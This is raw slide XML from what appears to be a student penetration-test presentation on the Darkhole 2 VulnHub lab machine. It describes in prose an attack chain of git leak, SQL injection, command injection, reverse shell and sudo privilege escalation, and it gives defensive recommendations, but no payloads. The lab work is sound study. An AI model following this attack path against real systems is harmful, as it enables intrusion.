          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Operating System / Platform:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– The primary penetration testing platform used throughout the assessment, equipped with pre-installed tools and a secure environment for exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Web Application Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Burp Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– Used for intercepting, modifying, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> HTTP requests and responses during web application exploitation. Assisted in testing and crafting SQLi payloads for id parameter. Helped verify command injection via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> paramete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>r.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303833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94CF4-F84F-C90D-40E5-81F1A4854B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D2FF6-37A4-2D28-03DC-6A7A26F0ED47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640773" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0"/>
              <a:t>Risk/ Impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC55C685-4EF4-9D02-05F2-160454D098B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="11638722" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The target machine was critically exposed due to multiple weaknesses. Open ports such as SSH and HTTP enabled basic enumeration, while the presence of an exposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory led to the leakage of sensitive source code and credentials. This allowed unauthorized access to the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A vulnerable GET parameter was found to be susceptible to SQL Injection, enabling enumeration of the database and extraction of usernames and passwords. Using these credentials, the attacker gained SSH access to the system and found additional clues in files like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Further analysis of the web application source revealed command injection via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> URL parameters. This allowed the attacker to achieve Remote Code Execution (RCE), create a reverse shell, and establish a persistent connection to internal services using SSH tunneling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lastly, weak privilege management allowed root access through Python execution with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rights. Combined, these issues led to full system compromise—affecting the confidentiality, integrity, and availability of the machine, and demonstrating the real-world impact of poor security hygiene.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2240480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3BBC2-A00E-7A88-8317-9D31A0E05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A2ABC2-E6E5-AED7-11B2-7F6D0C20B9D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640773" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0"/>
              <a:t>Recommendation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F43612E-E2C6-E0D8-14CE-22970851BE7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="11638722" cy="5331725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure Web Services Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent exposure of sensitive folders like .git by disabling directory listing and removing backup/dev files from production. Harden Apache/Nginx configurations before deployment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Input Validation &amp; SQL Injection Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use server-side input validation and parameterized queries to block SQL Injection. Deploy a Web Application Firewall (WAF) and enforce strict Content Security Policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Credential and Secrets Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never hardcode credentials in source code. Store secrets in secure vaults or environment variables. Enforce strong password policies and prevent weak credentials like "fool".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access Control &amp; Privilege Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow the principle of least privilege. Restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> access and avoid command execution as root unless absolutely necessary. Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and monitor sensitive file access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Prevent Remote Code Execution (RCE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitize all user inputs—especially those used in system calls. Avoid using raw input in shell functions and conduct regular secure code reviews to detect such flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Logging, Patching, and Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable centralized logging and alerting to detect suspicious activity like reverse shells or SSH tunnels. Patch all software components regularly to reduce exploitable vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Routine Security Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform regular penetration testing and security audits using both manual and automated tools (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Nmap, Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). Validate all findings and apply timely fixes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3038525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F968C-FE78-09FD-09DE-8E0E26544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62A46-5E06-EC49-A6C3-9DAC32D9DB32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2855777"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0"/>
              <a:t>Thank You</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65752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6A3D-38CC-A856-CD5F-92182B50CD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Abstract</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A92363E5-CF08-A1BA-65B1-3727BB583251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="11638722" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This project involved a penetration test on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>Darkhole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>machine from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>VulnHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, simulating a real-world attack scenario. Using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Kali Linux, Nmap, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we discovered exposed services and a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory that leaked credentials. These were used to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, access internal data, and establish a reverse shell through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>SSH tunneling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> Privilege escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>was achieved using misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  Despite challenges like bypassing input filters and payload encoding, the project demonstrated how minor misconfigurations can lead to full system compromise. Overall, this project reflected my ethical hacking approach—thinking like an attacker but acting as a responsible defender.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102821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29985-F698-D49B-6B01-DF90FF828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8CC5C-28D0-6F7A-8FD8-0742EDC376A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Vulnerability Summery</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A5F68BB-7263-8DEF-57E3-139E6135509C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="401797" y="966788"/>
            <a:ext cx="11451905" cy="5205412"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377200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6E5B5-BEF9-9F70-8B72-98A854470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21036-D9AF-C13F-D442-CC91D2F244B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4900" dirty="0"/>
              <a:t>Cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A0DF33-5CDD-57B4-0386-F155F7A85B42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="276225" y="967475"/>
            <a:ext cx="11639550" cy="2311058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46489B7-9A89-4D1C-5B53-4E4567781F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276225" y="3394802"/>
            <a:ext cx="6097656" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>GRAPH (PIE CHART):</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A red and yellow pie chart&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B80E3E8E-61D6-4784-3071-8947416E9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31" y="3579468"/>
            <a:ext cx="5011737" cy="2843041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198182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C922-10D0-9837-E74F-CC426F91F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CF2C9-C274-F2AB-42EB-05282F7F1C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Mapping against OWASP TOP 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27577B26-3952-9F20-F70A-56DDA5CC8D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="321365" y="911220"/>
            <a:ext cx="11549270" cy="5205412"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131726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A7D1A-8005-1237-FFC8-52AC30125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27487-9D28-F177-99F7-923E233843E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500269" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" u="sng" dirty="0"/>
              <a:t>Reconnaissance &amp; Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE58542C-D2BB-D4BA-3175-AB606C113413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308114" y="967475"/>
            <a:ext cx="6227768" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>Ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify our own IP address and network interface before starting the attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
